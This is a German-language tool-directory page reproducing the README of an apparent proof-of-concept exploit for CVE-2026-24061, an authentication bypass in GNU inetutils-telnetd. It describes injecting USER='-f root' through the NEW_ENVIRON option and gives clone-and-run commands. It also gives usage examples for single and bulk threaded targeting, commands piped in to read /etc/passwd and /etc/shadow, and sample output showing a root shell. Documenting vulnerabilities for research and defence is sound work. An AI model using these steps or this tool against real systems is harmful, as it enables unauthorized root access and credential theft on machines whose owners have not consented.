Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — Proof of Concept: CVE-2026-24061 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in GNU inetutils-telnetd, die es nicht authentifizierten Remote-Angreifern ermöglicht, sofortigen Root-Shell-Zugriff über bösartige NEW_ENVIRON-Telnet-Optionsausnutzung zu erhalten. | Kitploit
Tools/GitHubGitHub/sh4den/cve-2026-24061
Privilege EscalationSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsCommand and ControlAuthentifizierungPapers & ForschungLernen & BildungRemote-Access-Tool
GitHub
6112vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
sh4den/cve-2026-24061

CVE-2026-24061

Proof of Concept: CVE-2026-24061 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in GNU inetutils-telnetd, die es nicht authentifizierten Remote-Angreifern ermöglicht, sofortigen Root-Shell-Zugriff über bösartige NEW_ENVIRON-Telnet-Optionsausnutzung zu erhalten.

Repository anzeigen

CVE-2026-24061

GNU inetutils-telnetd - Remote Authentication Bypass

Ein Sicherheitsforschungstool zur Ausnutzung von CVE-2026-24061, einer kritischen Remote-Authentifizierungsumgehungsschwachstelle in GNU inetutils-telnetd, die sofortigen Root-Shell-Zugriff ohne Authentifizierung ermöglicht.


Inhaltsverzeichnis

  • Zusammenfassung der Schwachstelle
  • Betroffene Versionen
  • Technische Analyse
  • Voraussetzungen
  • Installation
  • Verwendung
  • Ausgabereferenz
  • Ausnutzungsmethodik
  • Minderung und Behebung
  • Indikatoren einer Kompromittierung
  • Rechtlicher Haftungsausschluss
  • Referenzen
  • Danksagungen

Zusammenfassung der Schwachstelle

FeldWert
CVE-KennungCVE-2026-24061
CVSS v3.1 Score9.8 (Kritisch)
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-KlassifizierungCWE-88: Unzureichende Neutralisierung von Argumenttrennzeichen in einem Befehl
AnbieterGNU-Projekt
Produktinetutils-telnetd
Offenlegungsdatum20. Januar 2026
Patch verfügbarTBD

Management-Zusammenfassung

Eine kritische Schwachstelle in GNU inetutils-telnetd bis Version 2.7 ermöglicht es nicht authentifizierten entfernten Angreifern, die Authentifizierung vollständig zu umgehen und sofortigen Root-Shell-Zugriff zu erlangen. Die Schwachstelle wird über die Telnet-Option NEW_ENVIRON ausgenutzt, indem eine speziell präparierte Umgebungsvariable USER mit dem Wert "-f root" injiziert wird, die alle Authentifizierungsmechanismen umgeht.

Auswirkungsbewertung

  • Vertraulichkeit: Vollständige Kompromittierung von Systemdaten
  • Integrität: Vollständige Systemkontrolle mit Root-Rechten
  • Verfügbarkeit: Potenzial für vollständige Systemübernahme oder Denial-of-Service
  • Umfang: Unverändert – die Ausnutzung betrifft nur den anfälligen Telnet-Dienst

Betroffene Versionen

VersionsbereichStatus
<= 2.7Anfällig
> 2.7Patch-Status TBD

Technische Analyse

Grundursache der Schwachstelle

Die Schwachstelle entsteht durch eine unsachgemäße Validierung der Umgebungsvariablen USER im Handler der Telnet-Option NEW_ENVIRON. Bei der Verarbeitung der Telnet-Option NEW_ENVIRON versäumt der Telnetd-Dienst es, den Wert der USER-Variablen zu bereinigen, bevor er an den Login-Prozess übergeben wird. Indem der Angreifer USER auf "-f root" setzt, injiziert er Befehlszeilenargumente, die die Authentifizierung für den Root-Benutzer ohne Angabe von Anmeldeinformationen erzwingen.

Angriffsvektor

  1. Angreifer stellt eine Verbindung zum Telnetd-Dienst her (typischerweise Port 23)
  2. Während der Telnet-Optionsaushandlung fordert der Server NEW_ENVIRON-Daten an
  3. Angreifer antwortet mit der Umgebungsvariablen USER, die auf "-f root" gesetzt ist
  4. Das bösartige Argument umgeht die Authentifizierungsprüfungen
  5. Sofortiger Root-Shell-Zugriff wird ohne Passwortabfrage gewährt
  6. Vollständige Systemkompromittierung ist erreicht

Ausnutzungskomplexität

  • Voraussetzungen: Netzwerkzugriff auf den Ziel-Telnetd-Dienst
  • Authentifizierung: Nicht erforderlich
  • Benutzerinteraktion: Keine
  • Angriffskomplexität: Niedrig

Voraussetzungen

Systemanforderungen

  • Python 3.7 oder höher
  • Netzwerkkonnektivität zu den Ziel-Telnetd-Instanzen
  • Ausreichende Berechtigungen zur Ausführung von Python-Skripten

Abhängigkeiten

Alle Abhängigkeiten sind Teil der Python-Standardbibliothek:

PaketZweck
socketNetzwerkkommunikation
selectI/O-Multiplexing
sysSysteminteraktion
osBetriebssystemschnittstelle
threadingGleichzeitige Zielausnutzung
datetimeZeitstempelformatierung

Installation

Methode 1: Mit Git

# Repository klonen
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Exploit ausführen
python3 main.py -u <ziel_ip>

Methode 2: Direkter Download

# Exploit herunterladen
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Ausführbar machen (Linux/macOS)
chmod +x main.py

# Exploit ausführen
python3 main.py -u <ziel_ip>

Methode 3: Manuelle Installation

# Sicherstellen, dass Python 3.7+ installiert ist
python3 --version

# Herunterladen und ausführen
python3 main.py -u <ziel_ip>

Verwendung

Befehlszeilenschnittstelle

Verwendung:
    python3 main.py -u <ziel_ip> [-p <port>] [-usr <benutzer>]
    python3 main.py -l <ziele_datei> [-p <port>] [-usr <benutzer>]
    echo "befehle" | python3 main.py -u <ziel_ip>

Argumente:
    -u          Einzelne Ziel-IP-Adresse oder Hostname
    -l          Pfad zu einer Datei mit Ziel-IPs (eine pro Zeile)
    -p          Zielport (Standard: 23)
    -usr        Benutzer, für den der Exploit ausgeführt wird (Standard: root)

Einzelziel-Ausnutzung

Ausnutzung einer einzelnen Telnetd-Instanz:

# Basis-Ausnutzung (Standardport 23, Benutzer root)
python3 main.py -u 192.168.1.100

# Benutzerdefinierter Port
python3 main.py -u 192.168.1.100 -p 2323

# Anderer Benutzer
python3 main.py -u 192.168.1.100 -usr admin

Befehlsausführungsmodus

Befehle nicht-interaktiv ausführen:

# Einzelner Befehl
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Mehrere Befehle
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Befehl mit Ausgabeumleitung
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Bulk-Ziel-Ausnutzung

Mehrere Ziele aus einer Datei ausnutzen:

python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

Zieldateiformat (targets.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Hinweise:

  • Ein Ziel pro Zeile
  • IP-Adressen oder Hostnamen
  • Leere Zeilen werden ignoriert
  • Ziele werden gleichzeitig mittels Threading ausgenutzt

Ausgabereferenz

Statusindikatoren

IndikatorFarbeBeschreibung
[SUCCESS]GrünErfolgreich mit Ziel verbunden
[EXPLOIT]GrünAusnutzungs-Payload erfolgreich gesendet
[INFO]BlauInformationsmeldung über aktuellen Vorgang
[ERROR]RotVerbindungsfehler, Zeitüberschreitung oder Ausnutzungsfehler
[WARNING]GelbWarnmeldung (derzeit nicht verwendet)

Beispielausgabe

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Ausnutzungsmethodik

Telnet-Protokoll-Aushandlungsprozess

Der Exploit nutzt die Aushandlungsphase des Telnet-Protokolls:

Tool herunterladen